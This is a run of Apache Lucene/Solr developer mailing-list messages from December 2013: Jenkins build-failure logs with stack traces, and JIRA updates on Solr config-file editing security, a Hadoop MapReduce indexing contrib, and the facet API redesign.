>>at java.util.concurrent.CountDownLatch

[JENKINS] Lucene-Solr-trunk-MacOSX (64bit/jdk1.7.0) - Build # 1084 - Failure!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-MacOSX/1084/
Java: 64bit/jdk1.7.0 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

All tests passed

Build Log:
[...truncated 28649 lines...]
   [junit4] JVM J0: stderr was not empty, see: 
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/solr/build/contrib/solr-mr/test/temp/junit4-J0-20131203_024237_409.syserr
   [junit4] >>> JVM J0: stderr (verbatim) 
   [junit4] 2013-12-03 02:43:15.791 java[231:6403] Unable to load realm info 
from SCDynamicStore
   [junit4] <<< JVM J0: EOF 

[...truncated 38787 lines...]
BUILD FAILED
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/build.xml:420: The following 
error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/build.xml:359: The following 
error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/extra-targets.xml:87: The 
following error occurred while executing this line:
/Users/jenkins/workspace/Lucene-Solr-trunk-MacOSX/extra-targets.xml:158: Source 
checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 136 minutes 23 seconds
Build step 'Invoke Ant' marked build as failure
Description set: Java: 64bit/jdk1.7.0 -XX:+UseCompressedOops 
-XX:+UseConcMarkSweepGC
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure




[jira] [Resolved] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Erick Erickson (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5518.
--

   Resolution: Fixed
Fix Version/s: 4.7
   5.0

Will remove from 4.7 Real Soon Now.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 does 
> it is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.






[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837235#comment-13837235
 ] 

ASF subversion and git services commented on SOLR-5518:
---

Commit 1547261 from [~erickoerickson] in branch 'dev/branches/branch_4x'
[ https://svn.apache.org/r1547261 ]

SOLR-5518: Move editing files to a separate request handler

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 does 
> it is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.






[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837168#comment-13837168
 ] 

ASF subversion and git services commented on SOLR-5518:
---

Commit 1547251 from [~erickoerickson] in branch 'dev/trunk'
[ https://svn.apache.org/r1547251 ]

SOLR-5518: Move editing files to a separate request handler

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 does 
> it is a security vulnerability and that disabling it should be the norm. 
> Subsequent discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.






[JENKINS] Lucene-Solr-Tests-trunk-Java7 - Build # 4515 - Still Failing

2013-12-02 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-Tests-trunk-Java7/4515/

All tests passed

Build Log:
[...truncated 58605 lines...]
BUILD FAILED
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/build.xml:420:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/build.xml:359:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/extra-targets.xml:87:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/extra-targets.xml:158:
 Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 115 minutes 45 seconds
Build step 'Invoke Ant' marked build as failure
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure




[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8549 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server
Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8549/
Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC

3 tests failed.
FAILED:  junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest

Error Message:
1 thread leaked from SUITE scope at 
org.apache.solr.hadoop.MorphlineReducerTest: 1) Thread[id=17, 
name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] at 
sun.misc.Unsafe.park(Native Method) at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215) 
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
 at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
 at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)  
   at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)

Stack Trace:
com.carrotsearch.randomizedtesting.ThreadLeakError: 1 thread leaked from SUITE 
scope at org.apache.solr.hadoop.MorphlineReducerTest: 
   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
group=TGRP-MorphlineReducerTest]
at sun.misc.Unsafe.park(Native Method)
at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)


FAILED:  junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest

Error Message:
There are still zombie threads that couldn't be terminated:1) Thread[id=17, 
name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] at 
sun.misc.Unsafe.park(Native Method) at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215) 
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
 at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
 at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)  
   at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)

Stack Trace:
com.carrotsearch.randomizedtesting.ThreadLeakError: There are still zombie 
threads that couldn't be terminated:
   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
group=TGRP-MorphlineReducerTest]
at sun.misc.Unsafe.park(Native Method)
at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)


FAILED:  org.apache.solr.hadoop.MorphlineReducerTest.testReducer

Error Message:


Stack Trace:
java.lang.ExceptionInInitializerError
at 
__randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925:8E2E7A5608ED2865]:0)
at org.apache.solr.core.ConfigSolr.fromInputStream(ConfigSolr.java:85)
at org.apache.solr.core.ConfigSolr.fromFile(ConfigSolr.java:64)
at org.apache.solr.core.ConfigSolr.fromSolrHome(ConfigSolr.java:94)
at org.apache.solr.core.CoreContainer.(CoreContainer.java:132)
at 
org.apache.solr.hadoop.SolrRecordWriter.createEmbeddedSolrServer(SolrRecordWriter.java:162)
at 
org.apache.solr.hadoop.SolrRecordWriter.(SolrRecordWriter.java:118)
at 
org.apache.solr.hadoop.SolrOutputFormat.getRecordWriter(SolrOutputFormat.java:161)
at 
org.apache.hadoop.mrunit.internal.mapreduce.MockMapreduceOutputFormat.collect(MockMapreduceOutputFormat.java:100)
at 
org.apache.hadoop.mrunit.internal.mapreduce.AbstractMockContextWrapper$4.answer(AbstractMockContextWrapper.java:90)
at 
org.mockito.internal.stubbing.StubbedInvocationMatcher.answer(StubbedInvocationMatcher.java:34)
at 
org.mockito.internal.handler.MockHandlerImpl.handle(MockHandlerImpl.java:91)
at 
org.mockito.internal.handler.NullResultGuardian.handle(NullResultGuardian.java:29)
at 
org.mockito.internal.handler.InvocationNotifierHandler.handle(InvocationNotifierHandler.java:38)
at 
org.mockito.internal.creation.MethodInterceptorFilter.intercept(MethodInterceptorFilter.java:51)
at 
org.apache.hadoop.mapreduce.Reducer$Context$$En

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837110#comment-13837110
 ] 

Uwe Schindler commented on SOLR-1301:
-

OK, I fixed the test suite to pass on Windows.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.
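
For orientation, wiring the output format into a job looks roughly like this 
(a sketch against the newer org.apache.hadoop.mapreduce API; the job name, 
reducer count, and output path are placeholders, not from the patch):

{code:java}
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.mapreduce.Job;
import org.apache.hadoop.mapreduce.lib.output.FileOutputFormat;
import org.apache.solr.hadoop.SolrOutputFormat;

public class SolrIndexJob {
  public static void main(String[] args) throws Exception {
    Job job = new Job(new Configuration(), "solr-index");
    job.setJarByClass(SolrIndexJob.class);
    // reducer output is fed straight into an EmbeddedSolrServer per reduce task
    job.setOutputFormatClass(SolrOutputFormat.class);
    // one shard (part-N directory) is produced per reduce task
    job.setNumReduceTasks(4);
    FileOutputFormat.setOutputPath(job, new Path(args[0]));
    System.exit(job.waitForCompletion(true) ? 0 : 1);
  }
}
{code}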






[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837090#comment-13837090
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547242 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547242 ]

SOLR-1301: Ignore windows tests that cannot work because they use UNIX 
semantics. Also remove a never-executed test which tests nothing

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.






[jira] [Commented] (LUCENE-5339) Simplify the facet module APIs

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-5339?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837086#comment-13837086
 ] 

ASF subversion and git services commented on LUCENE-5339:
-

Commit 1547241 from [~mikemccand] in branch 'dev/branches/lucene5339'
[ https://svn.apache.org/r1547241 ]

LUCENE-5339: nocommits, javadocs, tests, range drill downs

> Simplify the facet module APIs
> --
>
> Key: LUCENE-5339
> URL: https://issues.apache.org/jira/browse/LUCENE-5339
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/facet
>Reporter: Michael McCandless
>Assignee: Michael McCandless
> Attachments: LUCENE-5339.patch, LUCENE-5339.patch
>
>
> I'd like to explore simplifications to the facet module's APIs: I
> think the current APIs are complex, and the addition of a new feature
> (sparse faceting, LUCENE-5333) threatens to add even more classes
> (e.g., FacetRequestBuilder).  I think we can do better.
> So, I've been prototyping some drastic changes; this is very
> early/exploratory and I'm not sure where it'll wind up but I think the
> new approach shows promise.
> The big changes are:
>   * Instead of *FacetRequest/Params/Result, you directly instantiate
> the classes that do facet counting (currently TaxonomyFacetCounts,
> RangeFacetCounts or SortedSetDVFacetCounts), passing in the
> SimpleFacetsCollector, and then you interact with those classes to
> pull labels + values (topN under a path, sparse, specific labels).
>   * At index time, no more FacetIndexingParams/CategoryListParams;
> instead, you make a new SimpleFacetFields and pass it the field it
> should store facets + drill downs under.  If you want more than
> one CLI you create more than one instance of SimpleFacetFields.
>   * I added a simple schema, where you state which dimensions are
> hierarchical or multi-valued.  From this we decide how to index
> the ordinals (no more OrdinalPolicy).
> Sparse faceting is just another method (getAllDims), on both taxonomy
> & ssdv facet classes.
> I haven't created a common base class / interface for all of the
> search-time facet classes, but I think this may be possible/clean, and
> perhaps useful for drill sideways.
> All the new classes are under oal.facet.simple.*.
> Lots of things that don't work yet: drill sideways, complements,
> associations, sampling, partitions, etc.  This is just a start ...






[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837070#comment-13837070
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547239 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547239 ]

SOLR-1301: Fix windows problem with escaping of folder name (see crazy 
https://github.com/typesafehub/config/blob/master/HOCON.md for correct format: 
string must be quoted and escaped like javascript)

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.






[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread wolfgang hoschek (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837068#comment-13837068
 ] 

wolfgang hoschek commented on SOLR-1301:


There is also a known issue: Morphlines don't work on Windows, because the 
Guava ClassPath utility doesn't handle Windows path conventions. For example, 
see 
http://mail-archives.apache.org/mod_mbox/flume-dev/201310.mbox/%3c5acffcd9-4ad7-4e6e-8365-ceadfac78...@cloudera.com%3E
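
The general shape of the problem, as an illustration only (the actual failure 
sits inside Guava's classpath scanning): code that hard-codes ':' as the 
classpath separator mangles Windows entries, because the drive letter itself 
contains a ':'.

{code:java}
import java.io.File;
import java.util.Arrays;

public class ClasspathSplitDemo {
  public static void main(String[] args) {
    String windowsStyle = "C:\\solr\\lib\\a.jar;C:\\solr\\lib\\b.jar";
    // Unix-minded split on ':' yields [C, \solr\lib\a.jar;C, \solr\lib\b.jar]
    System.out.println(Arrays.toString(windowsStyle.split(":")));
    // Portable code must use File.pathSeparator (";" on Windows, ":" elsewhere).
    System.out.println("separator on this platform: " + File.pathSeparator);
  }
}
{code}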

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When a reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-5523) Implement proper security when writing config files to Solr

2013-12-02 Thread Erick Erickson (JIRA)
Erick Erickson created SOLR-5523:


 Summary: Implement proper security when writing config files to 
Solr
 Key: SOLR-5523
 URL: https://issues.apache.org/jira/browse/SOLR-5523
 Project: Solr
  Issue Type: Bug
Affects Versions: 5.0
Reporter: Erick Erickson
Priority: Blocker


Follow up on SOLR-5518 and SOLR-5287. We need to add proper security for 
writing files to Solr.

I can't pursue this for some time. If we decide to pull this out, we just need 
to remove EditFileRequestHandler; that should do it.




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread Erick Erickson (JIRA)
Erick Erickson created SOLR-5522:


 Summary: Pull modifying the Solr config documents out of Solr 4.x
 Key: SOLR-5522
 URL: https://issues.apache.org/jira/browse/SOLR-5522
 Project: Solr
  Issue Type: Bug
Affects Versions: 4.7
Reporter: Erick Erickson
Assignee: Erick Erickson
Priority: Blocker


Follow up on SOLR-5518 and SOLR-5287. We need to add proper security around 
the ability to write config files to Solr, or else we have a security hole.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-788) MoreLikeThis should support distributed search

2013-12-02 Thread Bill Mitchell (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837060#comment-13837060
 ] 

